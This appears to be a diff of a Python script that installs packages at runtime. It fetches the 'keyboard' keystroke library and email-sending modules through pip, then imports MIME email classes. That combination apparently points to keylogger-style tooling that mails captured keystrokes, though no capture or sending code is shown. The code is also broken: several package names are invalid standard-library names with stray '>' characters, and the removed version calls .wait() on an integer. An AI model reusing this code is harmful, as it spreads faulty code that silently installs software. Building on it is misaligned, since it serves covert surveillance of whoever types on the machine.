@@ -1,27 +1,10 @@
 from datetime import datetime
 import subprocess, sys
 
-
-try: 
-    process = subprocess.check_call([sys.executable, '-m', 'pip', 'install','keyboard'])
-    process.wait()
-except:
-    pass
-try: 
-    process = subprocess.check_call([sys.executable, '-m', 'pip', 'install','smtplib>'])
-    process.wait()
-except: 
-    pass
-try:
-    process = subprocess.check_call([sys.executable, '-m', 'pip', 'install','MIMEMultipart>'])
-    process.wait()
-except:
-    pass
-try:
-    process = subprocess.check_call([sys.executable, '-m', 'pip', 'install','MIMEText>'])
-    process.wait()
-except: 
-    pass
+process = subprocess.check_call([sys.executable, '-m', 'pip', 'install','keyboard'])
+process = subprocess.check_call([sys.executable, '-m', 'pip', 'install','smtplib>'])
+process = subprocess.check_call([sys.executable, '-m', 'pip', 'install','MIMEMultipart>'])
+process = subprocess.check_call([sys.executable, '-m', 'pip', 'install','MIMEText>'])
 
 from datetime import datetime
 from email.mime.multipart import MIMEMultipart
